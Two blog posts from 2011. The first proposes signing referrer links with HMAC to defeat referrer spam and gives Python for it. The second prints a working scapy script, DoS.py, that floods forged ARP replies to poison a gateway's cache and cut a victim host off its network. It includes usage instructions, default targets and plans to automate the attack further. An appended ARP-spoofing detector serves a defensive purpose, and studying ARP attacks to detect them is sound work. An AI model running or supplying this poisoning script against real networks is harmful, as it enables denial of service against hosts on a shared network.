Tuesday, December 13, 2011

Using cryptography as a protection from 'Referrer Spam'

I was recently looking at the analytics of my blog and found that for certain visits, the referrer was pointing to some spam websites. After a bit of testing I figured that the referrer section could be spoofed easily while making an HTTP request for any blog hosted by that provider. After some internet lookups, I learnt that the term for such an attack is 'Referrer Spam'. This means that someone with the right tools and wrong intent can set the HTTP Referer header to whatever they like and do two things:

         a. Spoof the referrer
         b. Blank out the referrer

Neither of these helps the analytics or the legitimate referrer. One mitigation is to use cryptography for an integrity check, so that spoofed values are never fed to the analytics engine. The idea is to sign the concatenation of the virtual path in the URL and a hash of the data in the referrer section, and to verify that signature before the referrer is trusted. One caveat shapes the design: the Referer header is written by the visitor's browser, not by the referring site, so the referrer cannot place a signature in the header itself. The signed token has to travel in the link the referrer publishes (for example as a query parameter), and the blog server then checks it against the Referer value the browser sends.

The following method can be followed:
Referrer Server:
1. Sign the concatenation of the target URL path and a hash of the expected 'Referrer' value with the referrer's private key (what the original describes as "encrypting with the private key" is a digital signature), and embed the result in the link.

Blog's Web Server:
1. Blog provider inspects the referrer section and checks whether the domain is a known one; unknown domains are rejected before any cryptography is done.
2. Verify the signature with the referrer's public key, reconstruct the virtual path and compare the hash with the data actually present in the 'Referrer' section.
3. If step 2 does not fail, display the content to the user and log the data to the analytics engine.
In the above method a symmetric key (an HMAC under a secret shared with each known referrer) can be used instead of a key pair; it is cheaper to verify, but each referrer then needs its own secret and the secrets have to be renewed on a timely basis.
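The method above, in the symmetric (HMAC) variant, as an added worked example that is not part of the original post. It assumes a constructed allowlist of known referrer domains with placeholder shared secrets (versioned by a key id so a secret can be rotated), that the referrer knows the URL of the page on which it publishes the link (the value the visitor's browser will send as Referer), and hypothetical function names `sign_link` and `check_request`:

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed key table (illustrative placeholders, not real secrets): each known
# referrer domain has one or more shared secrets indexed by a key id ('kid'), so a
# secret can be rotated by adding kid3 and later dropping kid2.
KNOWN_REFERRERS = {
    "friendlyblog.example": {"kid1": b"retired-secret", "kid2": b"current-secret"},
}


def _message(path: str, referrer_url: str) -> bytes:
    # The authenticated message is the virtual path of the requested blog page
    # joined with a hash of the Referrer value, as the post proposes.
    ref_hash = hashlib.sha256(referrer_url.encode()).hexdigest()
    return f"{path}|{ref_hash}".encode()


def sign_link(path: str, referrer_url: str, kid: str, secret: bytes) -> str:
    """Referrer side: build the link it publishes on referrer_url, carrying the tag."""
    tag = hmac.new(secret, _message(path, referrer_url), hashlib.sha256).hexdigest()
    return f"{path}?ref_sig={kid}.{tag}"


def check_request(request_target: str, referer_header: Optional[str]) -> str:
    """Blog side: classify one request before it is fed to analytics."""
    if not referer_header:
        return "no_referrer"            # blanked by the client (or a privacy policy)
    domain = urlsplit(referer_header).hostname or ""
    keys = KNOWN_REFERRERS.get(domain)
    if keys is None:
        return "unknown_referrer"       # step 1: not in the allowlist, no crypto spent
    target = urlsplit(request_target)
    sig_values = parse_qs(target.query).get("ref_sig", [])
    if len(sig_values) != 1 or "." not in sig_values[0]:
        return "missing_signature"      # claims a known domain but carries no tag
    kid, _, tag = sig_values[0].partition(".")
    secret = keys.get(kid)
    if secret is None:
        return "unknown_key"            # tag made under a key id we no longer accept
    expected = hmac.new(secret, _message(target.path, referer_header),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), tag.encode()):
        return "invalid_signature"      # step 2 failed: Referrer or path was altered
    return "trusted"                    # step 3: serve the page and log the referrer


if __name__ == "__main__":
    link = sign_link("/2011/12/post.html", "https://friendlyblog.example/links",
                     "kid2", b"current-secret")
    print(link)
    print(check_request(link, "https://friendlyblog.example/links"))   # trusted
    print(check_request(link, "https://spam.example/"))                # unknown_referrer
    print(check_request("/2011/12/post.html", "https://friendlyblog.example/links"))
```

The allowlist lookup runs before any HMAC computation, which is what keeps the junk-data denial of service (see the cons below) cheap to absorb. A spammer who copies a signed link off the referrer's page gets a tag that only validates for that page's URL, so forging a Referer pointing at a different site or page fails; what the scheme does not cover is a blanked Referer, which simply lands in the "no_referrer" bucket, or replay of the genuine link from the genuine page, which would need a timestamp or nonce in the signed message.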

The advantage of the above technique is that requests from unknown referrers can be marked and kept apart from the trusted data, and their source IPs flagged if the spam sources are to be investigated further.

Cons:
1. Attackers can attempt a Denial of Service by flooding the verification step with junk tokens, since every request that claims a known domain costs a signature check (public-key verification in particular is comparatively expensive; checking the domain allowlist first limits the damage).
2. A prior key exchange with each 'known' referrer is required.
3. All unknown referrers are treated as spammers/malicious unless further processing 'clears' them, so legitimate new referrers are lost from the analytics until they are enrolled.

Thursday, December 1, 2011

Simple ARP poison script in python

A quick python script to DoS a host on the network. It uses scapy, and you can set default values in the script. The attack relies on ARP poisoning: the script sends a stream of unsolicited ARP replies to arp_dest_ip (typically the gateway) claiming that victim_ip is at the bogus victim_mac, so the ARP cache on arp_dest_ip maps the victim to a dead address and traffic for the victim goes nowhere. The target's IP address is specified by victim_ip.

Here's the script:

#!/usr/bin/python
#DoS.py
#Default target is 10.0.3.3
#Sends forged ARP replies (op=2) to arp_dest_ip claiming that victim_ip is at
#victim_mac, so arp_dest_ip's ARP cache stops pointing at the real host.
import sys
from scapy.all import *

if len(sys.argv) > 1 and sys.argv[1] == "-h":
    print("Usage:")
    print("DoS [victim_ip] [arp_dest_ip] [arp_dest_mac] [victim_mac]")
    sys.exit(0)
print("Attacking....")

x=ARP()
x.op=2 #2 = ARP reply ("is-at"); nobody asked for it, so the reply is unsolicited
try:
    x.psrc=sys.argv[1] #SOURCE_IP: the victim's IP whose cache entry gets poisoned
except IndexError:
    x.psrc="10.0.3.3"
try:
    x.hwsrc=sys.argv[4] #SOURCE_MAC: the bogus MAC the victim's IP will be bound to
except IndexError:
    x.hwsrc="FF:FF:FF:FF:FF:FF" #Put a fake MAC address here
try:
    x.pdst=sys.argv[2] #DEST_IP: the host whose ARP cache is poisoned
    x.hwdst=sys.argv[3] #DEST_MAC
except IndexError:
    x.pdst="10.0.3.1" #Usually contains the IP of the gateway
    x.hwdst="FF:FF:FF:AB:CD:EF" #Should contain the MAC of the IP defined as x.pdst
x.show()

#Resend the same reply as fast as scapy allows: a near-zero interval and timeout
#plus an enormous retry count turn sr() into a flood loop.
sr(x,inter=0.0000000000000001,retry=-999999999,timeout=0.00000000000001)

Next I would want to automate most of the stuff above, so that minimum inputs are required, and add other kinds of logic, such as having the attacker pause the attack if the target quits the network, etc.

I am also thinking about how to thwart or raise an alert on such an attack...

P.S. I know scapy has pre-defined functions to conduct ARP attacks...I'm doing it manually just for the kicks...
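On the question of raising an alert on such an attack, here is an added example that is not part of the original post and not the author's script: a small ARP watcher that decodes raw Ethernet+ARP frames and flags the tell-tale signs of the flood that DoS.py produces. The capture it runs over is constructed inline, with assumed addresses (gateway 10.0.3.1, victim 10.0.3.3, an attacker NIC) and hypothetical names `parse_arp_frame`, `ArpWatch`, `build_arp`, `sample_capture` and `run`:

```python
import struct
from typing import Dict, List, Optional, Set, Tuple

ETH_P_ARP = 0x0806
BROADCAST = b"\xff" * 6
ZERO_MAC = b"\x00" * 6


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp_frame(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet II frame carrying IPv4-over-Ethernet ARP; None otherwise."""
    if len(frame) < 14 + 28:
        return None
    _eth_dst, eth_src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"eth_src": eth_src, "op": op, "sha": sha, "spa": spa, "tha": tha, "tpa": tpa}


class ArpWatch:
    """Tracks IP->MAC bindings learned from replies and open who-has requests."""

    def __init__(self) -> None:
        self.bindings: Dict[bytes, bytes] = {}            # ip -> first MAC seen for it
        self.pending: Set[Tuple[bytes, bytes]] = set()    # (requester ip, asked-for ip)

    def observe(self, frame: bytes) -> List[str]:
        alerts: List[str] = []
        arp = parse_arp_frame(frame)
        if arp is None:
            return alerts
        if arp["op"] == 1:                                 # request: remember who asked
            self.pending.add((arp["spa"], arp["tpa"]))
            return alerts
        if arp["op"] != 2:
            return alerts
        sha, spa, tpa = arp["sha"], arp["spa"], arp["tpa"]
        who = f"{ip_str(spa)} is-at {mac_str(sha)}"
        if sha[0] & 1:                                     # group bit: broadcast/multicast
            alerts.append(f"bogus sender MAC: {who}")      # never a real sender address
        if sha != arp["eth_src"]:                          # forged ARP body, real NIC
            alerts.append(f"ARP sender {mac_str(sha)} != Ethernet source "
                          f"{mac_str(arp['eth_src'])}")
        if (tpa, spa) in self.pending:                     # answers a request we saw
            self.pending.discard((tpa, spa))
        else:                                              # weak signal on its own:
            alerts.append(f"unsolicited reply: {who}")     # gratuitous ARP is legitimate
        known = self.bindings.get(spa)
        if known is None:
            self.bindings[spa] = sha
        elif known != sha:
            alerts.append(f"binding changed: {ip_str(spa)} was {mac_str(known)}, "
                          f"now {mac_str(sha)}")
        return alerts


def build_arp(eth_src: bytes, eth_dst: bytes, op: int,
              sha: bytes, spa: bytes, tha: bytes, tpa: bytes) -> bytes:
    """Assemble a raw Ethernet+ARP frame (used here only to construct the sample)."""
    return (struct.pack("!6s6sH", eth_dst, eth_src, ETH_P_ARP)
            + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op, sha, spa, tha, tpa))


# Constructed sample capture; the addresses are assumptions for the illustration.
GW_MAC, GW_IP = bytes.fromhex("aabbccdd0001"), bytes([10, 0, 3, 1])
VICTIM_MAC, VICTIM_IP = bytes.fromhex("aabbccdd0003"), bytes([10, 0, 3, 3])
ATTACKER_MAC = bytes.fromhex("aabbccdd0099")


def sample_capture() -> List[bytes]:
    return [
        # legitimate exchange: gateway asks who-has 10.0.3.3, the victim answers
        build_arp(GW_MAC, BROADCAST, 1, GW_MAC, GW_IP, ZERO_MAC, VICTIM_IP),
        build_arp(VICTIM_MAC, GW_MAC, 2, VICTIM_MAC, VICTIM_IP, GW_MAC, GW_IP),
        # poison, as DoS.py sends it: the attacker's NIC emits a reply binding the
        # victim's IP to the fake broadcast MAC, without any request preceding it
        build_arp(ATTACKER_MAC, GW_MAC, 2, BROADCAST, VICTIM_IP, GW_MAC, GW_IP),
    ]


def run(frames: List[bytes]) -> List[str]:
    watch = ArpWatch()
    alerts: List[str] = []
    for frame in frames:
        alerts.extend(watch.observe(frame))
    return alerts


if __name__ == "__main__":
    for line in run(sample_capture()):
        print("ALERT:", line)
```

The legitimate request/reply pair produces no alert, while the single poisoned frame trips all four checks at once. The Ethernet-source versus ARP-sender mismatch is the strongest of them against a script like the one above, because scapy fills in the real interface MAC at the link layer while the ARP body carries the fake one; the "unsolicited reply" check on its own would also fire on harmless gratuitous ARP, so in practice it is worth alerting on the rate of such replies rather than on each one.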